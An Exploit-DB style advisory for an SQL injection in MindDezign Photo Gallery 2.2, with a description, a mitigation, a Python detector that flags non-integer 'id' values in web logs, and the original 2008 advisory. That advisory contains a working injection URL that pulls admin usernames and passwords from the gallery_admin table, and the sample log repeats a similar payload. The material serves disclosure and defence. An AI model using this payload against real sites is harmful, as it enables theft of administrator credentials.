Vendor: MindDezign Photo Gallery
By: CWH Underground
CVSS: 8.8 HIGH
Remote SQL Injection
CWE: 89
Product Name: MindDezign Photo Gallery
Affected Version From: 2.2
Affected Version To: 2.2
Patch Exists: NO
Related CWE: N/A
CPE: a:minddezign:minddezign_photo_gallery
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

MindDezign Photo Gallery 2.2 (index.php id) Remote SQL Injection Vulnerability

MindDezign Photo Gallery 2.2 is vulnerable to SQL injection: an attacker can inject arbitrary SQL commands via the 'id' parameter of the 'index.php' script. PHP magic quotes must be turned off for the exploit to work. The exploit is triggered by sending a specially crafted HTTP request to the vulnerable script, with an SQL injection payload in the 'id' parameter. The backend database executes the payload, allowing the attacker to gain access to sensitive information such as usernames and passwords.

Mitigation:

Ensure that PHP magic quotes are turned on and that all user-supplied input is properly sanitized and validated.
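
An added example, not part of the original advisory or the product's code: the allow-list validation the mitigation calls for ('id' must be a plain integer), applied as a detector over web access logs. The log lines, addresses and /photos/ path are constructed, and treating 'cate_id' as numeric is an assumption based on the request shown in the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters assumed to be numeric; any other value is reported.
NUMERIC_PARAMS = ("id", "cate_id")
INT_RE = re.compile(r"[0-9]{1,10}")
# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')


def bad_params(url):
    """Return {param: decoded value} for gallery parameters that are not plain integers."""
    parts = urlsplit(url)
    if not parts.path.endswith("/index.php"):
        return {}
    # parse_qs percent-decodes values, so encoded quotes are seen as quotes.
    query = parse_qs(parts.query, keep_blank_values=True)
    if query.get("module") != ["gallery"]:
        return {}
    return {name: value
            for name in NUMERIC_PARAMS
            for value in query.get(name, [])
            if not INT_RE.fullmatch(value)}


def scan(lines):
    """Yield (line_number, findings) for each log line that fails the integer check."""
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            findings = bad_params(match.group(1))
            if findings:
                yield number, findings


# Constructed sample log: documentation addresses, hypothetical /photos/ install path.
SAMPLE_LOG = [
    '192.0.2.10 - - [23/Oct/2008:10:00:01 +0000] "GET /photos/index.php?module=gallery&action=info&cate_id=1&id=42 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [23/Oct/2008:10:00:09 +0000] "GET /photos/index.php?module=gallery&action=info&cate_id=1&id=-9999%27+union+select+1,2-- HTTP/1.1" 200 811',
    '192.0.2.77 - - [23/Oct/2008:10:00:12 +0000] "GET /photos/index.php?module=gallery&action=info&cate_id=1&id=12abc HTTP/1.1" 200 5120',
    '192.0.2.10 - - [23/Oct/2008:10:00:20 +0000] "GET /photos/style.css HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(f"line {number}: non-integer parameter(s) {findings}")
```

The same integer-only rule, enforced in the application before the value reaches the query, rejects the request regardless of the magic quotes setting.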

Exploit-DB raw data:

==================================================================================
  MindDezign Photo Gallery 2.2 (index.php id) Remote SQL Injection Vulnerability
==================================================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'

AUTHOR : CWH Underground
DATE   : 23 October 2008
SITE   : cwh.citec.us


#####################################################
APPLICATION : MindDezign Photo Gallery
VERSION	    : 2.2
DOWNLOAD    : http://gallery.minddezign.com/?module=download
#####################################################

--- Remote SQL Injection ---

** Magic Quotes must be turned off **


[+] Vulnerable in index.php (id)

---------
 Exploit
---------

[+] http://[target]/[gallery_path]/index.php?module=gallery&action=info&cate_id=1&id=-9999'+union+select+1,2,3,4,5,6,7,8,concat(gal_admin_username,0x3a3a,gal_admin_password),10+from+gallery_admin--


#######################################################################################
Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
Special Thx : asylu3, str0ke, citec.us, milw0rm.com
#######################################################################################

# milw0rm.com [2008-10-23]